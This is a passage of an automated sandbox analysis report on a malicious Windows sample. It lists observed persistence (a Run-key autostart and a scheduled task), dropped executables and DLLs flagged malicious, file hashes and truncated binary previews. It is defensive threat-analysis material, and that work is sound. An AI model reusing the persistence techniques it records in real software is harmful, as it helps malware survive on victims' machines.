                                                                                                                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                              • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                                                                                                                                              • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                              • VT rate limit hit for: file.exe
                                                                                                                                                                                                                              TimeTypeDescription
                                                                                                                                                                                                                              09:34:20API Interceptor20x Sleep call for process: powershell.exe modified
                                                                                                                                                                                                                              09:34:26API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                                                                                                                                              15:35:11AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run MyProgram C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              15:35:19AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run MyProgram C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              15:36:16Task SchedulerRun new task: ServiceData4 path: C:\Users\user\AppData\Local\Temp\/service123.exe
                                                                                                                                                                                                                              No context
                                                                                                                                                                                                                              No context
                                                                                                                                                                                                                              No context
                                                                                                                                                                                                                              No context
                                                                                                                                                                                                                              No context
                                                                                                                                                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                              Size (bytes):65536
                                                                                                                                                                                                                              Entropy (8bit):1.1415110456607969
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:UcKwBA35yvFPiV0UnU3TxaWBUUUEibdzuiFXZ24lO8iB:FPtFK2UnU1amUpZzuiFXY4lO8S
                                                                                                                                                                                                                              MD5:E4407CBBFF4B2E33AB89ACE68EDD5D1E
                                                                                                                                                                                                                              SHA1:D01BDA1C012D23BA3BD811ECCEDB3BCD2C9D967F
                                                                                                                                                                                                                              SHA-256:A9B631B21C0F4C16751C723AD444D30D948F88FCC0DE56D70A3D2BF685BF32B9
                                                                                                                                                                                                                              SHA-512:51D1ED38149C012555DC189DCFDADA11F15BBB96E9C8513E0B97DF447B7D45AC9BB4CABCB47ED587A71F274EDE02509B6D0AD5AF1C2FD8C4E60C9362B6BA01FE
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.1.6.5.8.4.5.9.6.8.4.7.4.8.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.1.6.5.8.4.6.0.5.4.4.1.5.1.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.c.2.f.5.f.1.d.-.8.4.3.6.-.4.d.2.2.-.a.d.d.6.-.4.c.a.e.3.0.d.c.1.8.a.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.a.f.b.5.5.9.2.-.0.5.c.7.-.4.d.d.d.-.b.b.5.6.-.5.3.8.4.d.e.0.9.6.5.5.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.T.r.a.n.s.p.o.n.e.r...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.4.0.-.0.0.0.1.-.0.0.1.4.-.f.2.3.0.-.b.6.7.3.8.6.0.e.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.9.8.7.8.5.3.e.9.0.f.6.0.5.6.a.0.6.1.c.8.9.8.f.b.9.d.3.d.a.1.c.a.0.0.0.0.0.0.0.0.!.0.0.0.0.8.f.a.3.9.6.9.9.d.6.6.2.1.a.a.d.e.b.1.b.0.2.f.8.3.1.6.a.a.b.b.4.0.8.5.6.e.e.f.3.!.f.i.l.e...e.x.e.....T.a.r.g.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                              File Type:Mini DuMP crash report, 16 streams, Tue Sep 24 13:34:20 2024, 0x1205a4 type
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):464749
                                                                                                                                                                                                                              Entropy (8bit):3.238110648751418
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3072:0kOJX2i6V2ej/1CCqwO3+vdAlMm14l5wQlg+cS2iZFZA/auDHFOf:09X2dV2mPqn3QdAlP1IE3DHc
                                                                                                                                                                                                                              MD5:C1A4A91B436004B96BEBA26F5B540857
                                                                                                                                                                                                                              SHA1:26E46A355477E1AC864D171D3F50CE6FAE4784A0
                                                                                                                                                                                                                              SHA-256:EB2192881F0838E02DE5007A5A7107B9F20F53AB758652B59B29A3EB3F3212B0
                                                                                                                                                                                                                              SHA-512:98CE5A7AD01082157AF2740DA8C33892454C2986F334F0A696ADE698AABF9731BFD0A44207F6B460D1D24726A8EDFCCE1897437E3C35B8D4330A997494C78B04
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MDMP..a..... .........f............t...........p...........$....%..........(%.......J..t...........l.......8...........T...........(8..E...........(B...........D..............................................................................eJ.......D......Lw......................T.......@.....f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8574
                                                                                                                                                                                                                              Entropy (8bit):3.7026649105430316
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:R6l7wVeJZCS1d6YSELDv3gmfB7MKprG89bGEQf0+im:R6lXJRf6YhLjgmftMQGzfv
                                                                                                                                                                                                                              MD5:20D8A4A54805853CF46343EECCD93999
                                                                                                                                                                                                                              SHA1:1BF55C3D0CB06E21D6ACF06276BF0851A354B26D
                                                                                                                                                                                                                              SHA-256:72FC458BBF785FE161310414AF70BB83C89C06C8B8DD69E66A7D6C45B02560B0
                                                                                                                                                                                                                              SHA-512:5402A0BFA25E52E3C89C3D3556E26B787BE3254B8221794D4A3A5B5684E86EE06FBC21E003CA77337C93C1B5E566A47994E48897BFE0A42BB5D76AAE562DDA33
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.4.8.8.<./.P.i.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4733
                                                                                                                                                                                                                              Entropy (8bit):4.484014933521905
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:cvIwWl8zs/tJg771I9z4WpW8VYjsRYm8M4JVQFhmyq852nzcMRXed:uIjf/HI70x7VzQJYmhwqXed
                                                                                                                                                                                                                              MD5:AE05C7FFB61EBC57BC78EE7394A32E23
                                                                                                                                                                                                                              SHA1:4C28CDBE4C02B999B1468F644ABAB1E8B26F1FC3
                                                                                                                                                                                                                              SHA-256:A7309CE69E436BB144D02A714133926D348B2CC65B9E16996381765E64B2D34D
                                                                                                                                                                                                                              SHA-512:E77F25DC3202E3CB92CFECA404739F970FC3EDF08B950C7BCF33E2B75AEDE10F442959D5FAC3FC8114A435543096CEC7E5586841C5885BAC1C1AF199CA3A3A68
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="514357" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                              File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 4770 bytes, 1 file, at 0x2c +A "disallowedcert.stl", number 1, 1 datablock, 0x1 compression
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4770
                                                                                                                                                                                                                              Entropy (8bit):7.946747821604857
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:9/nBu64pydcvOHRUfu0xK1bQYMRSRNoYmxYvk56sHMZhh4m:9/nBuP2cGxUfu6K1bpWJ6vfh4m
                                                                                                                                                                                                                              MD5:1BFE591A4FE3D91B03CDF26EAACD8F89
                                                                                                                                                                                                                              SHA1:719C37C320F518AC168C86723724891950911CEA
                                                                                                                                                                                                                              SHA-256:9CF94355051BF0F4A45724CA20D1CC02F76371B963AB7D1E38BD8997737B13D8
                                                                                                                                                                                                                              SHA-512:02F88DA4B610678C31664609BCFA9D61DB8D0B0617649981AF948F670F41A6207B4EC19FECCE7385A24E0C609CBBF3F2B79A8ACAF09A03C2C432CC4DCE75E9DB
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MSCF............,...................O.................2Wqh .disallowedcert.stl....^K...CK.wTS...:.w.K'.C0T.....Bh.{....C.).*.....Y@...(..).R."E..D^6........u....|f~3...o.3. ..SPK.k.o#...."{-.U..P........:..aPr.@.d......Dy.h.....)..:...!./\A.....A<I_<$...q.h..........'.....7....H...@`T..K.S.%...Y4..R.....`.....-....D...(..b..-c."...G.=.dx..S+..2.a.E....d.L...77J...c.[..@..iT&..^78..g....NW6.Ek..FY.F........cNt.O.*..R....*......D...... k........J.y...z.d...;.9_t...].@....yw..}.x....d.t..`f\K..;|.*h.X...4/.;.xT......q>.0...<...3...X..L$.&.,b.....\V....\......G..O..@..H3.....t..J..).x.?.{[..G>.7...<...^Q..z..Gw9P..d....i].n%K}.*z..2.Py...A..s...z..@...4..........4.....*Y.d..._Z.5.s..fl.C..#.K{9^.E...k..z.Ma..G.(.....5g. ...}.t.#4....$;.,....S@fs....k......u .^2.#_...I........;.......w..P...UCY...$;.S._|.x..dK...[i..q..^.l..A.?.....'N.. .L.l......m.*.+f#]............A.;.....Z..rIt....RW....Kr1e=8.=.z:Oi.z.d..r..C_......o...]j.N;.s....3@3.dgrv.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):338
                                                                                                                                                                                                                              Entropy (8bit):3.1514843840997506
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:kKPjBloN+SkQlPlEGYRMY9z+s3Ql2DUevat:315kPlE99SCQl2DUevat
                                                                                                                                                                                                                              MD5:FCED664145AE4310A0D0EF7448672EF5
                                                                                                                                                                                                                              SHA1:05CCCD1778BAA69D73C59C05D77161A32D8D3295
                                                                                                                                                                                                                              SHA-256:08288AE79EB080DED5214D792256D9B59097527D11D9781E9221F078C220BD6D
                                                                                                                                                                                                                              SHA-512:3B8BE08E375ED7163EA499552C17384A496510FD3C08C4E4FB257D7B466407CD2462E7875F48BDFEA8AFCDA29A90306CCD50CFD0663DD8889493832048DA82D4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:p...... ........[p[y....(....................................................... .........p.........$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".7.4.6.7.8.7.a.3.f.0.d.9.1.:.0."...
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6655499
                                                                                                                                                                                                                              Entropy (8bit):6.634213974500711
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:49152:d7mTqLmWtcNyB4DmikNPM7H2c1lZR6c8q2j2y3TeoQqu4UFafAocGl1pCvjpYZUf:lmCmymSPizH2eZR6cwj2y3ZPfjdSulL+
                                                                                                                                                                                                                              MD5:950CFC590026C689357A2DB4C9DE3FA6
                                                                                                                                                                                                                              SHA1:7FB0B7FD533B622C48CD02D056493AAC1E93ACBD
                                                                                                                                                                                                                              SHA-256:0C27861F03C8D88D8AD32B06A63F329A9AD895312ABB6878600AEB9CE745B67A
                                                                                                                                                                                                                              SHA-512:9DEAC7312325799AFD83A9DF287B370E0DC917CEDEAC451C9D558A28E66E4C2B0AA7280D1728A295619D19B66C40B33DA58A79EE0D04B5F59FF868D951964824
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 63%
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....0.f.,_..%.........#..G..~Z...f...........H...@.................................e.e....... ......................`..B....p...................................(..........................4.H......................q...............................text...t.G.......G.................`.P`.data.........H.......G.............@.`..rdata..X.... H.......H.............@.`@/4............H.......H.............@.0@.bss....T.f..pL.......................`..edata..B....`.......JL.............@.0@.idata.......p.......LL.............@.0..CRT....4............VL.............@.0..tls.................XL.............@.0..reloc...(.......*...ZL.............@.0B/14...................Z.............@..B/29..................Z.............@..B/41.....XL.......N...4\.............@..B/55.....B.............\.............@..B/67.....T............f].............@.0B/80.....a.............].
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):33225728
                                                                                                                                                                                                                              Entropy (8bit):6.186417299552574
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:196608:BRE7wYkLElCWviRtftCsfyFh2ii7kd626GhX+GhBfO2MqG7DMG3St:8cdn+h+Qd6rGhX+GhqD3St
                                                                                                                                                                                                                              MD5:B8A15F36239AC6A968A373BF93D06CE6
                                                                                                                                                                                                                              SHA1:BEABB3DA9B91DCBE608DD85D28D9BB69C744E3C0
                                                                                                                                                                                                                              SHA-256:FD6269BA61258F30291430D11AB1F0A6CF13E23D0FB9E6850212D6A1E4EAD7CA
                                                                                                                                                                                                                              SHA-512:CEF10F7B3FCB9EB980C020FB55AF18A1162084F7E9147F279FDBB64E179C1874C9DBEDBB4AC76046B023B03235EBB0EA6BD12A008F69673AB89A1E7F0448FE89
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 18%
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...................................`u............@..........................@............@.....................................L.......6$.......................;...................................................................................text............................... ..`.rdata..\...........................@..@.data...L...........................@....idata..L...........................@....reloc...;.......<..................@..B.symtab................................B.rsrc...6$.......&..................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):27424048
                                                                                                                                                                                                                              Entropy (8bit):7.9964497109171155
                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                              SSDEEP:786432:LssztSjW806q1QtIDxBZkxpVSFX50fIeyrZhp:LsszuW+2iID3yxpkaurZf
                                                                                                                                                                                                                              MD5:8A35BE4E0576E642603DC78F07F32A93
                                                                                                                                                                                                                              SHA1:D821C9F01FCB20DCEEAD90F85A2B7D5D126911E7
                                                                                                                                                                                                                              SHA-256:4465C73BA9FB8EC1B7D17678B81CDE013AF6CD95BBA661FFAF02CE77DEDCEB9F
                                                                                                                                                                                                                              SHA-512:FBCABADD010032A3E10630119D58C2FAA53709ACBECBD8DB8F7930AF503812FBFB7E88CC3C669F827B7DE086B20018ADB43A06760A22BBF18868B9B563D3CE6E
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 29%
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Zpc.Zpc.Zpc...`.]pc...f..pc...g.Ppc....Ypc...`.Spc...g.Kpc...f.rpc...b.Qpc.Zpb..pc.O.g.Cpc.O.a.[pc.RichZpc.........PE..d....q.f.........."....(.......................@..........................................`.................................................\...x....p...'...@..P"..............d...................................@...@............................................text............................... ..`.rdata..P*.......,..................@..@.data....S..........................@....pdata..P"...@...$..................@..@.rsrc....'...p...(..................@..@.reloc..d............*..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):64
                                                                                                                                                                                                                              Entropy (8bit):1.1940658735648508
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:NlllulJnp/p:NllU
                                                                                                                                                                                                                              MD5:BC6DB77EB243BF62DC31267706650173
                                                                                                                                                                                                                              SHA1:9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF
                                                                                                                                                                                                                              SHA-256:5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
                                                                                                                                                                                                                              SHA-512:91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:@...e.................................X..............@..........
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2343424
                                                                                                                                                                                                                              Entropy (8bit):6.507291548306534
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24576:11/7+Ny6imt6M5BRI+kDx1y0IQphHAokIEEKfMbrE8EPsoU0eJct/jVM5HFd5:11/7w95ctyTQHAjIEx2EPsoU0Lto7
                                                                                                                                                                                                                              MD5:45ED5B175FF3FEB7D39F8482C5E60848
                                                                                                                                                                                                                              SHA1:C0EB6EF9978FA1A62FFE8403870475B22DE3C7E7
                                                                                                                                                                                                                              SHA-256:FFADC62922AAC7F93D4EC6F2EB41CD836104F88D86B45E9FC295087FAD7D262E
                                                                                                                                                                                                                              SHA-512:69E24B20822B413EE3C7A5FFBD60F41AFB420E4BAC45DABEF31CCB2C9C3F9DC50B48E01E5C870B3367208F3A85FCEAF51F052C0B3ADF2B7A7F209A9532E36BEE
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......`...$...$...$...-.o.4....`..&....`.. ....`.. ....`..,....`..*...7g..&...o...#...$...,...$...?...7g......7g..n...7g..%...7g..%...7g..%...Rich$...........PE..d..._J.f.........." ...(.2...................................................@$...........`.........................................0F".`....F".......$.......#.h............ $.....0. ....................... .(..... .@............P..(............................text....1.......2.................. ..`.rdata..$....P.......6..............@..@.data........p"..b...J".............@....pdata..h.....#.......".............@..@.rsrc.........$.......#.............@..@.reloc....... $.......#.............@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):262656
                                                                                                                                                                                                                              Entropy (8bit):6.282156679924657
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6144:gXnnqhP8Sq5V6SuRI7OzhHTnLg9uP1+74/LgHmPr9qvZqhLaHLTLrLfqeqwLii66:gXnIPE5GhHTnLg9uP1+74/LgHmPr9qvG
                                                                                                                                                                                                                              MD5:30CEC332935A3E27B399A0939BDBECD7
                                                                                                                                                                                                                              SHA1:3FDB19380F95B3299C0C0CAC4D8F21EDFC14C368
                                                                                                                                                                                                                              SHA-256:91D0D471C50CFCC9FD8688AE2350477408BB987E67A1C5F508D17C5DD021314F
                                                                                                                                                                                                                              SHA-512:091B3FE2F4F4FA6FCAE8F920D9F97089CDB9DB8E57980588198873D07E12C994CBC860B02597BD128862E475AE0C54A283D6DBC194F1F2D3978BA77F7D39965B
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......E.}..s...s...s.......s.......s.......s.......s.......s.......s..J....s...s..ms.......s.......s.......s.......s..Rich.s..................PE..d...OJ.f.........." ...(..... ...............................................@............`.........................................@...h............ ..........|/...........0.......`..............................._..@...............`............................text............................... ..`.rdata.............................@..@.data....>.......:..................@....pdata..|/.......0..................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):24064
                                                                                                                                                                                                                              Entropy (8bit):5.671576218459356
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:Bl6YwU58iEr4Pp/zosXH1UXAN+I6kIbHOKZHMxgaUJ:Bl6Yp8jrszoE1UXvTHOCHM6a
                                                                                                                                                                                                                              MD5:D80E23C523BEA5ACA6EC702EF6DCBF8D
                                                                                                                                                                                                                              SHA1:A363362E722B68AAEA9BA30965AF18AAB505BFE1
                                                                                                                                                                                                                              SHA-256:C480EDC4EBD5757B92F543B0589AF0C6FEBF1153992B948322B7E69F2A0EAF61
                                                                                                                                                                                                                              SHA-512:D1381B1B929DCDBDFF8AEF1D09E05E7DF8F31E8A6C2CB89015B343FE963CA04AFB448E84436C4A04A5EF704FAADBF290AD1780D28F940FAE11D06359F66553F6
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........B...B...B...K...F....t..@.......@....t..A....t..J....t..N...Qs..A...B...m...Qs..C...Qs..C...Qso.C...Qs..C...RichB...........PE..d...PJ.f.........." ...(.6...*......@9....................................................`.........................................@`..h....`..x...............8...............@....U...............................S..@............P..`............................text...(5.......6.................. ..`.rdata.......P.......:..............@..@.data...P....p.......P..............@....pdata..8............R..............@..@.rsrc................Z..............@..@.reloc..@............\..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):14848
                                                                                                                                                                                                                              Entropy (8bit):5.083733997082165
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:sGrzuJtIEepKl1Cxmnyx1ttkobpsE0BDAXR09IckgTd2T:puJgp6Dy7XDbpsEiAXG9GgTd2
                                                                                                                                                                                                                              MD5:6469B7315A33774D1C7EF7459058F889
                                                                                                                                                                                                                              SHA1:FF37C958770C2BA3897D168A4AFBFFAD93E5E3BA
                                                                                                                                                                                                                              SHA-256:317E4219DE122F058C86F858F11B9510B6D196FD8027DD35352E7784E6968500
                                                                                                                                                                                                                              SHA-512:F56EA8983DA251908F7830A42EA57FEE1C6CD18EF00238693E108A9E58A560690769F69BBD639D2E5F239051012ACC17BC556CF3F5A09962B51ACE476FF471A2
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........>.mm.mm.mm...m.mm.9ll.mm.9nl.mm.9il.mm.9hl.mm.>ll.mm..ll.mm.lm.mm.>el.mm.>ml.mm.>.m.mm.>ol.mmRich.mm................PE..d...PJ.f.........." ...(.....$......@.....................................................`..........................................;..d...$<.......p.......`..................<...`5.............................. 4..@............0...............................text...x........................... ..`.rdata.......0......................@..@.data...X....P.......0..............@....pdata.......`.......2..............@..@.rsrc........p.......6..............@..@.reloc..<............8..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):412160
                                                                                                                                                                                                                              Entropy (8bit):6.5323629884961605
                                                                                                                                                                                                                              Encrypted:false
